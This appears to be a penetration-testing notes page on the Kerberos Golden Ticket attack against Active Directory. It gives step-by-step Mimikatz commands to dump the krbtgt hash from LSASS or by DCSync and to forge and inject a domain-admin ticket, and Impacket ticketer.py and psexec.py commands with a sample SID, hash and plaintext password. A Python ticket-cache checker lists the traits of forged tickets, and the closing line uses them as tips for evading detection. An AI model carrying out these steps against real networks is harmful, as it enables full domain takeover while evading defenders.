<aside>
📌 Summary
A Golden Ticket attack forges a Kerberos ticket-granting ticket (TGT) in Microsoft Active Directory. With the password hash of the domain's KRBTGT account, the key every TGT is encrypted with, an attacker can mint TGTs for any user, with any group membership and a validity of years, and so impersonate any account or system in the domain. For a penetration tester the technique shows what a single compromised privileged credential is worth, and why the KRBTGT secret has to be protected (and rotated after a compromise) and why strong authentication for privileged accounts matters.
</aside>
Once Mimikatz is loaded, enable SeDebugPrivilege with privilege::debug. On a domain controller the domain SID and the krbtgt NT hash can then be read out of LSASS with
lsadump::lsa /inject /name:krbtgt
(lsadump::lsa /inject patches LSASS and only works on a DC; with an account that holds replication rights the same secret can be pulled over DRSUAPI from any domain-joined host with lsadump::dcsync /domain:ORB.local /user:krbtgt.)

The kerberos module then forges the ticket and injects it into the current logon session:
kerberos::golden /User:Administrator /domain:ORB.local /sid:<SID> /krbtgt:<Hash> /id:500 /ptt
kerberos::golden /User:Administrator /domain:ORB.local /sid:S-1-5-21-1854181339-1499107752-1584228225 /krbtgt:bd4fa474174f84467b4b05dd3ec0bcf1 /id:500 /ptt
/User: the account name written into the ticket. It used to be any string, because the KDC only looked at the RID; on domain controllers patched for CVE-2021-42287 (updates rolled out from November 2021, enforced by default since late 2022) the KDC checks that the name matches the account that owns the RID, so use a real account name together with its real RID.
/id: the RID placed in the PAC (500 = built-in Administrator). Unless /groups is given, mimikatz also adds RIDs 513, 512, 520, 518 and 519 (Domain Users, Domain Admins, Group Policy Creator Owners, Schema Admins, Enterprise Admins).
/ptt: pass-the-ticket, i.e. inject the ticket into the current session instead of writing a .kirbi file.
/krbtgt takes the NT hash and produces an RC4-HMAC ticket; pass the account's AES256 key as /aes256:<key> instead for a ticket that does not stand out as an encryption downgrade in AES-only environments.
With the ticket injected (for example from within an RDP session on the host), start a shell that inherits it:
misc::cmd
misc::cmd spawns cmd.exe from mimikatz; because /ptt loaded the forged TGT into the current logon session, that shell and everything started from it authenticates as the forged user, e.g. when opening a domain controller's C$ share over UNC. klist in that shell shows the injected TGT.
ticketer.py
Reference: Impacket Deep Dives Vol. 2: Attacking Kerberos
From Linux the same ticket can be forged with ticketer.py from Impacket:
ticketer.py -nthash <krbtgt/service nthash> -domain-sid <your domain SID> -domain <your domain FQDN> baduser
ticketer.py -domain ORB.local -domain-sid S-1-5-21-1854181339-1499107752-1584228225 -nthash bd4fa474174f84467b4b05dd3ec0bcf1 lkisaka -user-id 1105
-nthash takes the krbtgt NT hash for a golden ticket (or a service account's hash, together with -spn, for a silver ticket); -aesKey can be given instead of -nthash for an AES-encrypted ticket. The default validity is 10 years (-duration, in hours).
<aside>
💡 As discussed in https://github.com/fortra/impacket/issues/1565, the forged ticket now has to name an existing user and carry its RID (-user-id); both, together with the domain SID, can be enumerated with lookupsid.py ORB.local/Administrator:'P@$$w0rd!'@10.0.0.12
</aside>

ticketer.py writes <username>.ccache into the current directory. Point KRB5CCNAME at that file, then pass -k (authenticate from the Kerberos cache) and -no-pass to any Impacket tool:
export KRB5CCNAME=/home/zhou/lkisaka.ccache
psexec.py ORB.local/lkisaka@<target hostname> -target-ip 10.0.0.131 -dc-ip 10.0.0.12 -no-pass -k
The target host name was mangled in this page's export; it has to be the host's DNS name, not an IP, because the service ticket is requested for cifs/<hostname> and validated against that name. The address goes in -target-ip, and -dc-ip points the TGS request at a domain controller.
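Added here as an example, not code from the page or from Impacket: a small reader for the MIT ccache v4 format that ticketer.py writes, plus the checks that make a forged TGT stand out (a 10-year lifetime against the 10-hour default, an RC4 session key in an AES domain). The sample cache is constructed in memory with the page's realm and user; the ticket blob and session key are dummy bytes, and the 0x40E00000 flag word (forwardable, renewable, initial, pre-authent) is an assumption about what a freshly issued TGT carries.

```python
"""Inspect a Kerberos credential cache (MIT ccache v4) before using it."""
import struct
import time

TGT_SERVICE = "krbtgt"
ETYPE_NAMES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}
# RFC 4120 TicketFlags bit positions as stored in the ccache's 32-bit big-endian word
FLAG_NAMES = {0x40000000: "forwardable", 0x00800000: "renewable",
              0x00400000: "initial", 0x00200000: "pre-authent"}


def _data(b: bytes) -> bytes:
    """A ccache 'data' item: 32-bit big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def _principal(realm: str, components: list, name_type: int = 1) -> bytes:
    """A ccache principal: name type, component count, realm, then each component."""
    out = struct.pack(">II", name_type, len(components)) + _data(realm.encode())
    return out + b"".join(_data(c.encode()) for c in components)


def build_ccache(user, realm, etype, key, lifetime_s, ticket, now=None) -> bytes:
    """Write a minimal v4 ccache holding one TGT, shaped like ticketer.py's output.
    The ticket blob is opaque here; a real one is the ASN.1 Ticket encrypted with the krbtgt key."""
    now = int(time.time()) if now is None else now
    # file version 0x0504, then 12 bytes of header fields: one DeltaTime field (tag 1, length 8)
    header = struct.pack(">HH", 0x0504, 12) + struct.pack(">HHII", 1, 8, 0, 0)
    cred = _principal(realm, [user])                              # client
    cred += _principal(realm, [TGT_SERVICE, realm], name_type=2)  # server: krbtgt/REALM
    cred += struct.pack(">H", etype) + _data(key)                 # session key block
    cred += struct.pack(">IIII", now, now, now + lifetime_s, now + lifetime_s)  # auth/start/end/renew
    cred += struct.pack(">BI", 0, 0x40E00000)                     # is_skey, ticket flags (assumed)
    cred += struct.pack(">II", 0, 0)                              # no addresses, no authdata
    cred += _data(ticket) + _data(b"")                            # ticket, second_ticket
    return header + _principal(realm, [user]) + cred


class _Reader:
    def __init__(self, buf: bytes):
        self.buf, self.pos = buf, 0

    def take(self, n: int) -> bytes:
        if self.pos + n > len(self.buf):
            raise ValueError("truncated ccache")
        self.pos += n
        return self.buf[self.pos - n:self.pos]

    def u8(self): return self.take(1)[0]
    def u16(self): return struct.unpack(">H", self.take(2))[0]
    def u32(self): return struct.unpack(">I", self.take(4))[0]
    def data(self): return self.take(self.u32())

    def principal(self) -> str:
        self.u32()                        # name type, not needed for the report
        count = self.u32()
        realm = self.data().decode()
        return "/".join(self.data().decode() for _ in range(count)) + "@" + realm


def parse_ccache(buf: bytes) -> dict:
    """Parse a v4 ccache into its default principal and credential entries."""
    r = _Reader(buf)
    if r.u16() != 0x0504:
        raise ValueError("only MIT ccache v4, which Impacket writes, is handled")
    r.take(r.u16())                       # skip the header fields
    cc = {"default_principal": r.principal(), "creds": []}
    while r.pos < len(buf):
        client, server = r.principal(), r.principal()
        etype, _key = r.u16(), r.data()
        _authtime, starttime, endtime, renew_till = (r.u32() for _ in range(4))
        r.u8()                            # is_skey
        flags = r.u32()
        for _ in range(r.u32()):          # addresses: type + data
            r.u16(); r.data()
        for _ in range(r.u32()):          # authorization data: type + data
            r.u16(); r.data()
        ticket, _second = r.data(), r.data()
        cc["creds"].append({"client": client, "server": server, "etype": etype,
                            "starttime": starttime, "endtime": endtime, "renew_till": renew_till,
                            "flags": [n for bit, n in FLAG_NAMES.items() if flags & bit],
                            "ticket_len": len(ticket)})
    return cc


def check_tgt(cred: dict, max_lifetime_s: int = 10 * 3600) -> list:
    """What makes a forged TGT stand out; an empty list means it looks KDC-issued."""
    findings = []
    if not cred["server"].startswith(TGT_SERVICE + "/"):
        findings.append("not a TGT: server is " + cred["server"])
    lifetime = cred["endtime"] - cred["starttime"]
    if lifetime > max_lifetime_s:
        findings.append("lifetime %dh exceeds the 10h default TGT policy" % (lifetime // 3600))
    if cred["etype"] == 23:
        findings.append("rc4-hmac session key: an encryption downgrade in an AES-only domain")
    return findings


if __name__ == "__main__":
    # constructed sample: the 10-year RC4 TGT that ticketer.py and mimikatz forge by default
    forged = build_ccache("lkisaka", "ORB.LOCAL", 23, b"\x11" * 16, 10 * 365 * 86400, b"\x00" * 64)
    for cred in parse_ccache(forged)["creds"]:
        print(cred["client"], "->", cred["server"], ETYPE_NAMES.get(cred["etype"], cred["etype"]),
              cred["flags"], check_tgt(cred))
```

To inspect a real cache, pass open(path, "rb").read() to parse_ccache. The two findings the sample trips are exactly the properties defenders look for in forged TGTs, so when stealth matters forge with -aesKey and a -duration inside the domain's TGT policy instead of the defaults.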
